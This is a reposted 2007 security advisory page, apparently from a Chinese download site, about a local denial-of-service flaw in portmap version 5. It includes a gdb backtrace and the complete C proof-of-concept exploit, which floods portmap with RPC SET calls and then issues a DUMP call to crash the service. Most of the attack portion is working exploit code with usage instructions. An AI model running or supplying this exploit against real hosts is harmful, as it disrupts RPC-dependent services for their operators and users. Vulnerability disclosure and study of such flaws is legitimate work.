 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| Portmap Local DoS (Set + Dump) | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
Portmap is a server that converts RPC program numbers into DARPA protocol port numbers. It must be running in order to make RPC calls. Portmap is vulnerable to Denial of Service attacks commited from localhost. Credit: The original article can be found at: http://www.milw0rm.com/exploits/1815 Details Vulnerable Systems: * Portmap version 5. Exploit: ///////////////////////////////////// // portmap Set+Dump Local DoS - PoC //////////////////////////////////// // // Federico L. Bossi Bonin // fbossi[at]netcomm[dot]com[dot]ar //////////////////////////////////// // Tested on Linux with version 5 // USE DEBUGGING MODE ///////////////////// // (gdb) backtrace // #0 0xffffe410 in __kernel_vsyscall () // #1 0xb7f21343 in write () from /lib/tls/libc.so.6 // #2 0xb7f524d5 in svcfd_create () from /lib/tls/libc.so.6 // #3 0xb7f5467a in xdrrec_create () from /lib/tls/libc.so.6 // #4 0xb7f546f4 in xdrrec_create () from /lib/tls/libc.so.6 // #5 0xb7f5350d in xdr_u_long () from /lib/tls/libc.so.6 // #6 0xb7f4f48c in xdr_pmap () from /lib/tls/libc.so.6 // #7 0xb7f54e3b in xdr_reference () from /lib/tls/libc.so.6 // #8 0xb7f4f565 in xdr_pmaplist () from /lib/tls/libc.so.6 // #9 0xb7f50025 in xdr_accepted_reply () from /lib/tls/libc.so.6 // #10 0xb7f53cc5 in xdr_union () from /lib/tls/libc.so.6 // #11 0xb7f50171 in xdr_replymsg () from /lib/tls/libc.so.6 // #12 0xb7f5266e in svcfd_create () from /lib/tls/libc.so.6 // #13 0xb7f50ddc in svc_sendreply () from /lib/tls/libc.so.6 // #14 0x0804984d in reg_service (rqstp=0xbfecab4c, xprt=0xbfec872c) at portmap.c:515 // #15 0xb7f51345 in svc_getreq_common () from /lib/tls/libc.so.6 // #16 0xb7f5111d in svc_getreq_poll () from /lib/tls/libc.so.6 // #17 0xb7f51979 in svc_run () from /lib/tls/libc.so.6 // #18 0x080492dd in main (argc=134542752, argv=0xbfecb0e0) at portmap.c:303 #include <stdio.h> #include <rpc/rpc.h> #include <sys/socket.h> #include <sys/time.h> #include <netdb.h> #include <rpc/pmap_prot.h> int i; int len=600; char myhost[256]; main(int argc, char *argv[]) { if (argc < 2) { printf("usage:%s <hostname>/n",argv[0]); exit(1); } if (argc >2) { len=atoi(argv[2]); } if (len > 1024) { len=1024; } unsigned long PROGRAM=100000; unsigned long VERSION=2; struct hostent *hp; struct sockaddr_in server_addr; int sock = RPC_ANYSOCK; register CLIENT *client; enum clnt_stat clnt_stat; struct timeval timeout; timeout.tv_sec = 40; timeout.tv_usec = 0; if ((hp = gethostbyname(argv[1])) == NULL) { printf("Can't resolve %s/n",argv[1]); exit(0); } gethostname(myhost,255); bcopy(hp->h_addr, (caddr_t)&server_addr.sin_addr,hp->h_length); server_addr.sin_family = AF_INET; server_addr.sin_port = 0; if ((client = clnttcp_create(&server_addr,PROGRAM,VERSION,&sock,1024,1024)) == NULL) { clnt_pcreateerror("clnttcp_create"); exit(0); } client->cl_auth = authunix_create(myhost, 0, 0, 0, NULL); char *data = (char *) malloc(1024); memset(data,0x0,strlen(data)); char *response = (char *) malloc(1024); memset(response,0x0,strlen(response)); for (i = 0 ; i < len ; i++) { memcpy(data+strlen(data),"1",1); clnt_call(client,1,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); } clnt_call(client,4,(xdrproc_t) xdr_wrapstring ,(char *) &data,(xdrproc_t) xdr_wrapstring,(char *) response,timeout); clnt_destroy(client); close(sock); free(data); free(response); exit(0); } |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)